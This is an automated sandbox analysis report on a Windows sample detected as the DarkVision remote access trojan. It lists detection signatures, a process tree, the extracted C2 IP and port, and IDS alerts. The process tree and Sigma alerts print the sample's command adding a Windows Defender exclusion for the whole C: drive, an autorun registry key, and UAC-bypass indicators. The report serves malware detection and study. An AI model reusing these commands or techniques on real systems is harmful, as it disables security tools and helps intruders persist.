Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe
Analysis ID:1656296
MD5:18b6c58f5f099a577c2f322eba74d1e9
SHA1:11cf8353e6adcf12061b4afb95c63308bda399b2
SHA256:2c5b54f2576e1524d5dc1c5405d2b8cfe72fc16ca2a1c7c319e0961833d9d069
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

DarkVision Rat
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates HTML files with .exe extension (expired dropper behavior)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Searches for specific processes (likely to inject)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Windows Binaries Write Suspicious Extensions
Switches to a custom stack to bypass stack traces
Tries to evade analysis by execution special instruction (VM detection)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to load drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution From GUID Like Folder Names
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe" MD5: 18B6C58F5F099A577C2F322EBA74D1E9)
    • cmd.exe (PID: 7744 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7800 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • svchost.exe (PID: 7780 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • tzutil.exe (PID: 8188 cmdline: "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" "" MD5: BAD4357401102697881E78923E2607B6)
        • powershell.exe (PID: 7524 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2856 cmdline: powershell Remove-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7356 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • w32tm.exe (PID: 7332 cmdline: "C:\Users\user\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" "" MD5: 15BDC4BD67925EF33B926843B3B8154B)
  • cleanup

Malware Configuration

Threatname: DarkVision Rat

{"C2": "82.29.67.160", "Port": 443}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2571622191.000001C3DDDD8000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
    00000004.00000002.2571622191.000001C3DDDD8000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000000.00000002.1322401814.0000000000434000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
        00000000.00000002.1322401814.0000000000434000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000000.00000002.1323038047.0000000000785000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
              0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x36ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x36e18:$s1: CoGetObject
                • 0x36eb0:$s2: Elevation:Administrator!new:
                4.2.svchost.exe.1c3ddda0000.0.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                  4.2.svchost.exe.1c3ddda0000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 6 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 7780, TargetFilename: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ParentProcessId: 7688, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 7744, ProcessName: cmd.exe
                    Sigma detected: Windows Binaries Write Suspicious Extensions
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 7780, TargetFilename: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\svchost.exe, ProcessId: 7780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ParentProcessId: 7688, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 7744, ProcessName: cmd.exe
                    Sigma detected: Suspicious Execution From GUID Like Folder Names
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\system32\svchost.exe", ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 7780, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, ProcessId: 7356, ProcessName: cmd.exe
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ParentProcessId: 7688, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7780, ProcessName: svchost.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7744, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 7800, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ParentProcessId: 7688, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7780, ProcessName: svchost.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-04T08:44:20.773192+020020283713Unknown Traffic192.168.2.649689104.26.8.202443TCP
                    2025-04-04T08:44:23.452645+020020283713Unknown Traffic192.168.2.649691104.26.8.202443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-04T08:44:18.515459+020020456181A Network Trojan was detected192.168.2.64968882.29.67.160443TCP
                    2025-04-04T08:44:22.555238+020020456181A Network Trojan was detected192.168.2.64969082.29.67.160443TCP
                    2025-04-04T08:44:26.561097+020020456181A Network Trojan was detected192.168.2.64969282.29.67.160443TCP
                    2025-04-04T08:44:30.576741+020020456181A Network Trojan was detected192.168.2.64969382.29.67.160443TCP
                    2025-04-04T08:44:34.746710+020020456181A Network Trojan was detected192.168.2.64972682.29.67.160443TCP
                    2025-04-04T08:44:38.749169+020020456181A Network Trojan was detected192.168.2.64974782.29.67.160443TCP
                    2025-04-04T08:44:42.780112+020020456181A Network Trojan was detected192.168.2.64977882.29.67.160443TCP
                    2025-04-04T08:44:46.810979+020020456181A Network Trojan was detected192.168.2.64977982.29.67.160443TCP
                    2025-04-04T08:44:50.847331+020020456181A Network Trojan was detected192.168.2.64978082.29.67.160443TCP
                    2025-04-04T08:44:54.858214+020020456181A Network Trojan was detected192.168.2.64978182.29.67.160443TCP
                    2025-04-04T08:44:58.873995+020020456181A Network Trojan was detected192.168.2.64978282.29.67.160443TCP
                    2025-04-04T08:45:02.907126+020020456181A Network Trojan was detected192.168.2.64978382.29.67.160443TCP
                    2025-04-04T08:45:06.608116+020020456181A Network Trojan was detected192.168.2.64978482.29.67.160443TCP
                    2025-04-04T08:45:10.045494+020020456181A Network Trojan was detected192.168.2.64978582.29.67.160443TCP
                    2025-04-04T08:45:13.248624+020020456181A Network Trojan was detected192.168.2.64978782.29.67.160443TCP
                    2025-04-04T08:45:16.217686+020020456181A Network Trojan was detected192.168.2.64978882.29.67.160443TCP
                    2025-04-04T08:45:18.998963+020020456181A Network Trojan was detected192.168.2.64978982.29.67.160443TCP
                    2025-04-04T08:45:21.608216+020020456181A Network Trojan was detected192.168.2.64979082.29.67.160443TCP
                    2025-04-04T08:45:24.061584+020020456181A Network Trojan was detected192.168.2.64979182.29.67.160443TCP
                    2025-04-04T08:45:26.386226+020020456181A Network Trojan was detected192.168.2.64979282.29.67.160443TCP
                    2025-04-04T08:45:28.545686+020020456181A Network Trojan was detected192.168.2.64979382.29.67.160443TCP
                    2025-04-04T08:45:30.592605+020020456181A Network Trojan was detected192.168.2.64979482.29.67.160443TCP
                    2025-04-04T08:45:32.545572+020020456181A Network Trojan was detected192.168.2.64979582.29.67.160443TCP
                    2025-04-04T08:45:34.405919+020020456181A Network Trojan was detected192.168.2.64979682.29.67.160443TCP
                    2025-04-04T08:45:36.186587+020020456181A Network Trojan was detected192.168.2.64979782.29.67.160443TCP
                    2025-04-04T08:45:37.889324+020020456181A Network Trojan was detected192.168.2.64979882.29.67.160443TCP
                    2025-04-04T08:45:39.514670+020020456181A Network Trojan was detected192.168.2.64979982.29.67.160443TCP
                    2025-04-04T08:45:41.092535+020020456181A Network Trojan was detected192.168.2.64980082.29.67.160443TCP
                    2025-04-04T08:45:42.608146+020020456181A Network Trojan was detected192.168.2.64980182.29.67.160443TCP
                    2025-04-04T08:45:44.061111+020020456181A Network Trojan was detected192.168.2.64980282.29.67.160443TCP
                    2025-04-04T08:45:45.467493+020020456181A Network Trojan was detected192.168.2.64980382.29.67.160443TCP
                    2025-04-04T08:45:46.858101+020020456181A Network Trojan was detected192.168.2.64980482.29.67.160443TCP
                    2025-04-04T08:45:48.202767+020020456181A Network Trojan was detected192.168.2.64980582.29.67.160443TCP
                    2025-04-04T08:45:49.498856+020020456181A Network Trojan was detected192.168.2.64980682.29.67.160443TCP
                    2025-04-04T08:45:50.780809+020020456181A Network Trojan was detected192.168.2.64980782.29.67.160443TCP
                    2025-04-04T08:45:52.045869+020020456181A Network Trojan was detected192.168.2.64980882.29.67.160443TCP
                    2025-04-04T08:45:53.280759+020020456181A Network Trojan was detected192.168.2.64980982.29.67.160443TCP
                    2025-04-04T08:45:54.499881+020020456181A Network Trojan was detected192.168.2.64981082.29.67.160443TCP
                    2025-04-04T08:45:55.686130+020020456181A Network Trojan was detected192.168.2.64981182.29.67.160443TCP
                    2025-04-04T08:45:56.858358+020020456181A Network Trojan was detected192.168.2.64981282.29.67.160443TCP
                    2025-04-04T08:45:58.014628+020020456181A Network Trojan was detected192.168.2.64981382.29.67.160443TCP
                    2025-04-04T08:45:59.170831+020020456181A Network Trojan was detected192.168.2.64981482.29.67.160443TCP
                    2025-04-04T08:46:00.312122+020020456181A Network Trojan was detected192.168.2.64981582.29.67.160443TCP
                    2025-04-04T08:46:01.423493+020020456181A Network Trojan was detected192.168.2.64981682.29.67.160443TCP
                    2025-04-04T08:46:02.597591+020020456181A Network Trojan was detected192.168.2.64981782.29.67.160443TCP
                    2025-04-04T08:46:03.687528+020020456181A Network Trojan was detected192.168.2.64981882.29.67.160443TCP
                    2025-04-04T08:46:04.780153+020020456181A Network Trojan was detected192.168.2.64981982.29.67.160443TCP
                    2025-04-04T08:46:05.858475+020020456181A Network Trojan was detected192.168.2.64982082.29.67.160443TCP
                    2025-04-04T08:46:06.951633+020020456181A Network Trojan was detected192.168.2.64982182.29.67.160443TCP
                    2025-04-04T08:46:08.031198+020020456181A Network Trojan was detected192.168.2.64982282.29.67.160443TCP
                    2025-04-04T08:46:09.108467+020020456181A Network Trojan was detected192.168.2.64982382.29.67.160443TCP
                    2025-04-04T08:46:10.156035+020020456181A Network Trojan was detected192.168.2.64982482.29.67.160443TCP
                    2025-04-04T08:46:11.338928+020020456181A Network Trojan was detected192.168.2.64982582.29.67.160443TCP
                    2025-04-04T08:46:12.389542+020020456181A Network Trojan was detected192.168.2.64982682.29.67.160443TCP
                    2025-04-04T08:46:13.452800+020020456181A Network Trojan was detected192.168.2.64982782.29.67.160443TCP
                    2025-04-04T08:46:14.498641+020020456181A Network Trojan was detected192.168.2.64982882.29.67.160443TCP
                    2025-04-04T08:46:15.545636+020020456181A Network Trojan was detected192.168.2.64982982.29.67.160443TCP
                    2025-04-04T08:46:16.592755+020020456181A Network Trojan was detected192.168.2.64983082.29.67.160443TCP
                    2025-04-04T08:46:17.632228+020020456181A Network Trojan was detected192.168.2.64983182.29.67.160443TCP
                    2025-04-04T08:46:18.671054+020020456181A Network Trojan was detected192.168.2.64983282.29.67.160443TCP
                    2025-04-04T08:46:19.701973+020020456181A Network Trojan was detected192.168.2.64983382.29.67.160443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAvira: detected
                    Found malware configuration
                    Source: 4.2.svchost.exe.1c3ddda0000.0.unpackMalware Configuration Extractor: DarkVision Rat {"C2": "82.29.67.160", "Port": 443}
                    Multi AV Scanner detection for dropped file
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeReversingLabs: Detection: 45%
                    Source: C:\Windows\Temp\bS4Vs_8188.sysReversingLabs: Detection: 33%
                    Multi AV Scanner detection for submitted file
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeVirustotal: Detection: 64%Perma Link
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeReversingLabs: Detection: 80%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleNeural Call Log Analysis: 99.9%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_004051CA CryptBinaryToStringW,CryptBinaryToStringW,__snwprintf,LocalFree,WaitForSingleObject,RtlExitUserThread,__snwprintf,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,0_2_004051CA
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_0041CFE0 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,0_2_0041CFE0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBDD8F CryptReleaseContext,CryptDestroyHash,4_2_000001C3DDDBDD8F
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBDD5A CryptReleaseContext,CryptDestroyHash,4_2_000001C3DDDBDD5A
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBDCF7 CryptReleaseContext,CryptDestroyHash,4_2_000001C3DDDBDCF7
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBDD1E CryptReleaseContext,CryptDestroyHash,4_2_000001C3DDDBDD1E
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBDC00 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,4_2_000001C3DDDBDC00
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDA53B0 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,CryptBinaryToStringW,CryptBinaryToStringW,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,4_2_000001C3DDDA53B0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008F82FC malloc,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,free,8_2_008F82FC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0093F028 CryptGenRandom,RegSetValueExA,GetWindowsDirectoryW,8_2_0093F028
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008E71EA CryptAcquireContextA,CryptCreateHash,8_2_008E71EA
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008E71E8 CryptAcquireContextA,CryptCreateHash,8_2_008E71E8
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008E7244 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,8_2_008E7244
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008EE4C4 CryptAcquireContextA,CryptCreateHash,8_2_008EE4C4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008F8478 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_008F8478
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008EE510 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,8_2_008EE510
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: -----BEGIN PUBLIC KEY-----8_2_008FF214
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: -----BEGIN PUBLIC KEY-----8_2_008D3268
                    Source: tzutil.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.svchost.exe.1c3ddda0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2571622191.000001C3DDDD8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1322401814.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1323038047.0000000000785000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe PID: 7688, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7780, type: MEMORYSTR
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.6:49689 version: TLS 1.2
                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbz source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: _prod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: WINLOA~1.PDBw source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Rprod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.0000000000520000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_00410B94 __snwprintf,FindFirstFileW,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,0_2_00410B94
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDA97F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,4_2_000001C3DDDA97F0
